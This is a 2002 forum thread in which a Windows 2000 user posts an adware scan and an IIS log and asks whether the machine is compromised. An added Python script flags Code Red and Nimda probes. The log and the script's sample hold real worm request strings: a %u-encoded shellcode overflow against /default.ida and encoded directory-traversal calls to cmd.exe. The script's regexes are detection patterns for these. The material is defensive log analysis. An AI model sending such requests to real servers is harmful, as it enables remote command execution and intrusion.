[Help] Has this machine been compromised?

Raccoon
2002-11-13, 09:08 PM
Running WIN2K updated to SP3, used only for eDonkey ("the donkey").
It has been behaving abnormally these past few days. I checked and a scan with iparmor turned up the following:

「Scanning registry is over.
Find ad procedure: c:\documents and settings\administrator\「開始」功能表\programs\radiate\free software.url
Find ad procedure: c:\documents and settings\administrator\「開始」功能表\programs\radiate\privacy policy.url
Find ad procedure: c:\documents and settings\administrator\「開始」功能表\programs\radiate\radiate web site.url
Find ad procedure: c:\documents and settings\administrator\cookies\administrator@doubleclick[2].txt
Doubleclick Spyware Cookie found in c:\documents and settings\administrator\cookies\administrator@doubleclick[2].txt
Find ad procedure: c:\documents and settings\administrator\cookies\administrator@fastclick[1].txt
Find ad procedure: c:\documents and settings\administrator\cookies\[email protected][2].txt
Find ad procedure: c:\documents and settings\administrator\cookies\administrator@hitbox[2].txt
Find ad procedure: c:\documents and settings\administrator\cookies\administrator@lop[1].txt
Find ad procedure: c:\documents and settings\administrator\cookies\[email protected][1].txt
Valueclick Spyware Cookie found in c:\documents and settings\administrator\cookies\[email protected][2].txt
Find ad procedure: c:\documents and settings\administrator\cookies\administrator@valueclick[1].txt
Valueclick Spyware Cookie found in c:\documents and settings\administrator\cookies\administrator@valueclick[1].txt
Find ad procedure: c:\program files\common files\everad shared\everadsv.dll
Find ad procedure: c:\program files\common files\everad shared\everadsv.exe
Find ad procedure: c:\winnt\system32\adimage.dll
Find ad procedure: c:\winnt\system32\htmdeng.exe
Find ad procedure: c:\winnt\system32\ipcclient.dll
Find ad procedure: c:\winnt\system32\msipcsv.exe
Find ad procedure: c:\winnt\system32\tfde.dll」
IIS log file:

#Software: Microsoft Internet Information Services 5.0
#Version: 1.0
#Date: 2002-11-13 00:09:59
#Fields: date time c-ip cs-username s-ip s-port cs-method cs-uri-stem cs-uri-query sc-status cs(User-Agent)
2002-11-13 00:09:59 217.34.54.146 - 61.64.79.180 80 GET /default.ida NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a 200 -
2002-11-13 01:26:19 61.64.93.80 - 61.64.79.180 80 GET /scripts/root.exe /c+dir 404 -
2002-11-13 03:14:17 192.168.1.12 - 192.168.1.5 80 OPTIONS / - 200 Microsoft-WebDAV-MiniRedir/5.1.2600
2002-11-13 03:14:17 192.168.1.12 - 192.168.1.5 80 PROPFIND /movie - 404 Microsoft-WebDAV-MiniRedir/5.1.2600
2002-11-13 06:37:14 61.167.241.24 - 61.64.79.180 80 GET /scripts/root.exe /c+dir 404 -
2002-11-13 06:37:24 61.167.241.24 - 61.64.79.180 80 GET /MSADC/root.exe /c+dir 403 -
2002-11-13 06:37:35 61.167.241.24 - 61.64.79.180 80 GET /c/winnt/system32/cmd.exe /c+dir 404 -
2002-11-13 07:07:21 61.54.131.162 - 61.64.79.180 80 GET /scripts/root.exe /c+dir 404 -
2002-11-13 07:07:21 61.54.131.162 - 61.64.79.180 80 GET /MSADC/root.exe /c+dir 403 -
2002-11-13 07:07:23 61.54.131.162 - 61.64.79.180 80 GET /c/winnt/system32/cmd.exe /c+dir 404 -
2002-11-13 07:07:23 61.54.131.162 - 61.64.79.180 80 GET /d/winnt/system32/cmd.exe /c+dir 404 -
2002-11-13 07:07:24 61.54.131.162 - 61.64.79.180 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 500 -
2002-11-13 07:07:24 61.54.131.162 - 61.64.79.180 80 GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir 500 -
2002-11-13 07:07:25 61.54.131.162 - 61.64.79.180 80 GET /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir 404 -
2002-11-13 07:07:25 61.54.131.162 - 61.64.79.180 80 GET /msadc/..%5c../..%5c../..%5c/..?../..?../..?../winnt/system32/cmd.exe /c+dir 403 -
2002-11-13 07:07:27 61.54.131.162 - 61.64.79.180 80 GET /scripts/..?../winnt/system32/cmd.exe /c+dir 500 -
2002-11-13 07:07:27 61.54.131.162 - 61.64.79.180 80 GET /scripts/..?../winnt/system32/cmd.exe /c+dir 404 -
2002-11-13 07:07:28 61.54.131.162 - 61.64.79.180 80 GET /scripts/..嶸../winnt/system32/cmd.exe /c+dir 404 -
2002-11-13 07:07:28 61.54.131.162 - 61.64.79.180 80 GET /winnt/system32/cmd.exe /c+dir 404 -
2002-11-13 07:07:30 61.54.131.162 - 61.64.79.180 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 500 -
2002-11-13 07:07:30 61.54.131.162 - 61.64.79.180 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 500 -
2002-11-13 07:07:30 61.54.131.162 - 61.64.79.180 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 500 -
2002-11-13 07:07:31 61.54.131.162 - 61.64.79.180 80 GET /scripts/..%2f../winnt/system32/cmd.exe /c+dir 500 -


Does this mean things look grim?
ddd
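A small added script (not part of this thread) that parses the W3C extended log format shown in the post and flags entries matching the well-documented Code Red (`/default.ida` with a `%u`-encoded payload) and Nimda (`cmd.exe` / `root.exe` requests, often via `..%5c` or `..%2f` traversal) probe shapes, groups them by source IP, and lists any probe the server answered with a 2xx status. The embedded sample is a subset of the log lines from the post, with the long run of N's in the `/default.ida` request abbreviated; the signature names and the `analyse` function are my own.

```python
"""Flag IIS 5 W3C extended log entries that match known IIS worm probe shapes."""
import re
from collections import defaultdict

# Signature names are my own labels for the request shapes visible in the post.
SIGNATURES = {
    "code_red_ida": re.compile(r"/default\.ida", re.I),          # Code Red entry point
    "cmd_root_exe": re.compile(r"(cmd|root)\.exe", re.I),        # Nimda / web shell probes
    "traversal": re.compile(r"\.\.(%5c|%2f|%c0|%c1|\?|\\|/)", re.I),  # encoded ..\ or ../
    "unicode_shellcode": re.compile(r"%u[0-9a-f]{4}", re.I),     # %uXXXX-encoded payload
}

# Subset of the log excerpt from the post (default.ida N-run abbreviated).
SAMPLE_LOG = """#Software: Microsoft Internet Information Services 5.0
#Version: 1.0
#Date: 2002-11-13 00:09:59
#Fields: date time c-ip cs-username s-ip s-port cs-method cs-uri-stem cs-uri-query sc-status cs(User-Agent)
2002-11-13 00:09:59 217.34.54.146 - 61.64.79.180 80 GET /default.ida NNNNNNNN%u9090%u6858%ucbd3%u7801%u00=a 200 -
2002-11-13 01:26:19 61.64.93.80 - 61.64.79.180 80 GET /scripts/root.exe /c+dir 404 -
2002-11-13 03:14:17 192.168.1.12 - 192.168.1.5 80 OPTIONS / - 200 Microsoft-WebDAV-MiniRedir/5.1.2600
2002-11-13 06:37:24 61.167.241.24 - 61.64.79.180 80 GET /MSADC/root.exe /c+dir 403 -
2002-11-13 07:07:24 61.54.131.162 - 61.64.79.180 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 500 -
2002-11-13 07:07:31 61.54.131.162 - 61.64.79.180 80 GET /scripts/..%2f../winnt/system32/cmd.exe /c+dir 500 -
""".splitlines()


def parse_w3c(lines):
    """Yield one dict per log record, keyed by the names in the #Fields header."""
    fields = None
    for line in lines:
        line = line.rstrip("\n")
        if not line:
            continue
        if line.startswith("#"):
            if line.startswith("#Fields:"):
                fields = line[len("#Fields:"):].split()
            continue
        if fields is None:
            continue  # no header seen yet; cannot interpret the columns
        parts = line.split(" ")
        if len(parts) != len(fields):
            continue  # malformed or truncated line; skip rather than guess
        yield dict(zip(fields, parts))


def classify(record):
    """Return the list of signature names matching the request path and query."""
    target = record.get("cs-uri-stem", "") + " " + record.get("cs-uri-query", "")
    return [name for name, rx in SIGNATURES.items() if rx.search(target)]


def analyse(lines):
    """Return (hits, accepted).

    hits: source IP -> list of (uri-stem, status, matched signatures)
    accepted: probes the server answered with a 2xx status, as (ip, uri-stem, status)
    """
    hits = defaultdict(list)
    accepted = []
    for rec in parse_w3c(lines):
        tags = classify(rec)
        if not tags:
            continue
        status = int(rec["sc-status"])
        hits[rec["c-ip"]].append((rec["cs-uri-stem"], status, tags))
        if 200 <= status < 300:
            accepted.append((rec["c-ip"], rec["cs-uri-stem"], status))
    return dict(hits), accepted


if __name__ == "__main__":
    hits, accepted = analyse(SAMPLE_LOG)
    for ip, entries in hits.items():
        print(f"{ip}: {len(entries)} probe(s)")
        for uri, status, tags in entries:
            print(f"    {status} {uri}  [{', '.join(tags)}]")
    print("probes answered with 2xx:", accepted)
```

Reading the result: a 4xx on these paths means IIS did not serve the requested file, and the internal WebDAV `OPTIONS`/`PROPFIND` traffic from 192.168.1.12 is not flagged at all. The one entry that deserves attention is the `/default.ida` request that returned 200, because that is the Code Red vector and a 2xx means the server accepted the request; whether the overflow actually ran depends on whether the `.ida` ISAPI mapping was present and unpatched, which the log alone cannot show. The 500 responses on the `..%5c` traversal requests are likewise inconclusive from the status code and should be checked against the SP3 patch level and for any unexpected files under `scripts\` or `system32\`.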

shauronglu
2002-11-14, 01:41 PM
Paste it over here and let's talk about it.